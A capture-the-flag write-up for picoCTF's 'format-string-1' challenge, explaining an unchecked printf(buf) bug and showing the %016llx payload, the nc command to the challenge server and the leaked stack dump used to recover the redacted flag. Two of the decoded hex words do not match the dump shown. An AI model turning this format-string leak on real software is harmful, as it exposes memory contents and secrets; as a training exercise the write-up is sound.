100 points
Category: Binary Exploitation
Tags: #binaryexploitation #formatstring #infoleak
Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!
Inspecting the provided source code 'format-string-1.c' we can see that three files are required to progress through the execution of the challenge, otherwise it terminates early.
Inspecting the buffers these files are read into, we have the following in main() :
char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];
To test locally we must create a dummy flag file:
$ echo "dummyflag{1234}" > flag.txt
Create the secret menu item files with some readily identifiable data that will fill the associated buffers (secret1 and secret2) to locate them in memory :
$ echo $(python3 -c 'print("A" * 64)') > secret-menu-item-1.txt
$ echo $(python3 -c 'print("B" * 64)') > secret-menu-item-2.txt
A quick check of the provided challenge binary format-string-1 we can see this is a 64-bit executable:
$ file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped
Further analysis of the source code shows a string is read from the user via standard input of up to 1024 characters using scanf() into the destination buf, but then prints the buffer without a format specifier.
...
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
...
Using a typical format string attack to leak information from the stack, with our known input data to locate the secret1 and secret2 buffers that surround our target flag buffer. This is done by constructing a format string as our user input to print a large series of sequential hexadecimal numbers (in this case 50), with a little formatting to pad and help seperate the values for simplified visual insepction, effectively dumping a region of the stack. As the arguments of a typical format string call would normally be pushed onto the stack as part of the call. Hence without these parameters forming part of the call, printf() will attempt to use whatever is on the stack at the respective stack locations as the arguments to be displayed, hence the info leak.
$ echo $(python3 -c 'print("%016llx." * 50)') | ./format-string-1
Give me your order and I'll read it back to you:
Here's your order: 0000000000402118.0000000000000000.000079dfbe816a00.0000000000000000.00000000007b0c80.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.0042424242424242.616c66796d6d7564.0a7d343332317b67.0000000000000000.000079dfbe8b5160.000079dfbe8b5b10.000079dfbe8b5160.00000001be8b78d8.000079dfbe8b54d0.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.0041414141414141.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.
Bye!
Knowing the contents of secret1 is filled with a string of A characters (or 0x41) and secret2 is filled with B characters (or 0x42), we can quickly locate this in our stack dump above.
Between these buffers is our flag buffer, the start of which can be seen in the 14'th 64-bit word in the dumped stack.
For verification we may compare the hexadecimal representation of our dummy flag file with the contents of the extracted flag buffer, remembering to be mindful of endianess in the comparison.
$ hd flag.txt
00000000 64 75 6d 6d 79 66 6c 61 67 7b 31 32 33 34 7d 0a |dummyflag{1234}.|
Repeating the above attack on the picoCTF challenge server to dump the real flag file contents we end up with the following output:
$ echo $(python3 -c 'print("%016llx." * 50)') | nc mimas.picoctf.net 56961
Give me your order and I'll read it back to you:
Here's your order: 0000000000402118.0000000000000000.00007b3c0fb03a00.0000000000000000.0000000000abb880.000000000a347834.00007ffd9692ca70.00007b3c0f8f4e60.00007b3c0fb194d0.0000000000000001.00007ffd9692cb40.0000000000000000.0000000000000000.7b4654436f636970.355f31346d316e34.3478345f33317937.34365f673431665f.007d363131373732.0000000000000007.00007b3c0fb1b8d8.0000002300000007.206e693374307250.00000a336c797453.0000000000000009.00007b3c0fb2cde9.00007b3c0f8fd098.00007b3c0fb194d0.0000000000000000.00007ffd9692cb50.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.
Bye!
Manually extracting the 64 characters (or 8 64-bit words) starting from the 14'th word in our dumped stacked data :
{ 7b4654436f636970.355f31346d316e34.3478345f33317937.34365f673431665f.007d363131373732.0000000000000007.00007b3c0fb1b8d8.0000002300000007 }
Converting each byte of these words to ASCII characters, we can see evidence of our flag :
0x7b4654436f636970 = 7b.46.54.43.6f.63.69.70 = {FTCocip.
0x355f31346d316e34 = 35.5f.31.34.6d.31.6e.34 = 5_14m1n4
0x3478345f33317937 = 34.78.34.5f.33.31.79.37 = 4x4_31y7
0x30355f673431665f = 30.35.5f.67.34.31.66.5f = 05_g41f_
0x007d343663363933 = 00.7d.34.36.63.36.39.33 = }46c693
Some minor reconstruction of the string from the dumped little endian words, we have our flag:
picoCTF{...........redacted.............}
Where the actual flag value has been redacted for the purposes of this write up.